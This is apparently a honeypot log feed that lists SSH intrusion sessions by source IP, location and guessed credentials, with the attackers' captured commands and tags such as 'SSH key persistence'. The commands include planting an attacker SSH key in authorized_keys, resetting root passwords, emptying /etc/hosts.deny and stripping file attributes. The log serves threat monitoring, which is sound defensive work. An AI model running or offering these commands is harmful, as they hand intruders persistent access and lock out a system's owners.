$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:GLnnZxLPMDJu"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:CB2IQLw5cTQK"|chpasswd|bash
$ echo -e "123456\nr8v7PlpowEj6\nr8v7PlpowEj6"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nr8v7PlpowEj6\nr8v7PlpowEj6\n"|passwd
🎭 eagle_root_37 (34.72.208.101) β€” Council Bluffs, United States Β· 2 sessions Β· 39 cmds
2026-05-23 13:56 EDT Β· as es/es, root/Qwer@12
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:XPECQwVXwAw1"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "es\n9im6AxLzG6Cl\n9im6AxLzG6Cl"|passwd|bash
$ Enter new UNIX password:
$ echo "es\n9im6AxLzG6Cl\n9im6AxLzG6Cl\n"|passwd
🎭 yankee_root_32 (209.141.47.217) β€” Las Vegas, United States Β· 2 sessions Β· 39 cmds
2026-05-23 13:53 EDT Β· as es/es, root/Qwer@12
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "es\njBcRiIZxuWfJ\njBcRiIZxuWfJ"|passwd|bash
$ Enter new UNIX password:
$ echo "es\njBcRiIZxuWfJ\njBcRiIZxuWfJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:JIsckC8I7opK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 cowboy_root_36 (50.187.96.100) β€” Cambridge, United States Β· 3 sessions Β· 59 cmds
2026-05-23 13:48 EDT Β· as root/Bl123456, sambauser/123456, tunnel/1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:YmZJnnypMjbi"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123456\npm84UDaSbLvv\npm84UDaSbLvv"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\npm84UDaSbLvv\npm84UDaSbLvv\n"|passwd
$ echo -e "1234\nE2sJCxkLITdV\nE2sJCxkLITdV"|passwd|bash
$ echo "1234\nE2sJCxkLITdV\nE2sJCxkLITdV\n"|passwd
🎭 lantern_root_26 (182.40.195.233) β€” Suzhou, China Β· 1 session Β· 20 cmds
2026-05-23 14:06 EDT Β· as odoo17/admin
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "admin\nPNPrrdDR7oHf\nPNPrrdDR7oHf"|passwd|bash
$ Enter new UNIX password:
$ echo "admin\nPNPrrdDR7oHf\nPNPrrdDR7oHf\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_64 (102.213.34.99) β€” Talatona, Angola Β· 1 session Β· 19 cmds
2026-05-23 13:59 EDT Β· as root/Qwer@12
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:FHJP2B1APN9I"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 monet_root_7 (173.212.232.236) β€” Lauterbourg, France Β· 1 session Β· 19 cmds
2026-05-23 13:47 EDT Β· as root/123456qq@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:hmeEg0YyWmMg"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 gouda_sol_3 (45.153.34.112) β€” Eygelshoven, Netherlands Β· 4 sessions Β· 4 cmds
2026-05-08 13:41 EDT Β· as minecraft/1, omm/omm, playground/playground
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—4
🎭 star_root_32 (50.116.106.59) β€” Houston, United States Β· 1 session Β· 2 cmds
2026-05-23 13:33 EDT Β· as root/dev@2025
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 seoul_root_18 (125.142.37.91) β€” Goyang-si, South Korea Β· 2 sessions Β· 22 cmds
2026-05-06 03:04 EDT Β· as aroot/aroot, debian/P@ssw0rd123@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "P@ssw0rd123@\ngcgqRKge8aK6\ngcgqRKge8aK6"|passwd|bash
$ Enter new UNIX password:
$ echo "P@ssw0rd123@\ngcgqRKge8aK6\ngcgqRKge8aK6\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_63 (42.96.17.228) β€” QuαΊ­n Mα»™t, Vietnam Β· 1 session Β· 2 cmds
2026-05-23 12:11 EDT Β· as root/@a123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 jade_root_16 (101.126.66.30) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-23 12:09 EDT Β· as minecraft/1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1\nUGyNPfPFPKiS\nUGyNPfPFPKiS"|passwd|bash
$ Enter new UNIX password:
$ echo "1\nUGyNPfPFPKiS\nUGyNPfPFPKiS\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 k-pop_root_15 (43.155.137.19) β€” Seoul, South Korea Β· 1 session Β· 2 cmds
2026-05-23 11:49 EDT Β· as aroot/aroot
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 ghost_root_80 (154.57.216.142) β€” Karachi, Pakistan Β· 1 session Β· 2 cmds
2026-05-23 11:41 EDT Β· as root/Pwd@Linux
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 specter_root_70 (165.154.5.148) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 21 cmds
2026-05-13 13:40 EDT Β· as halo/halo, root/Passw0rd1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:jZw5EyKs39Hq"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_77 (77.42.126.54) β€” Helsinki, Finland Β· 1 session Β· 2 cmds
2026-05-23 10:44 EDT Β· as halo/halo
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 tsar_root_8 (89.111.134.241) β€” Moscow, Russia Β· 3 sessions Β· 6 cmds
2026-05-23 10:17 EDT Β· as julian/julian, root/Lai123456, root/test123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 yankee_root_33 (149.165.147.159) β€” Bloomington, United States Β· 3 sessions Β· 6 cmds
2026-05-23 10:13 EDT Β· as julian/julian, root/Lai123456, root/test123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
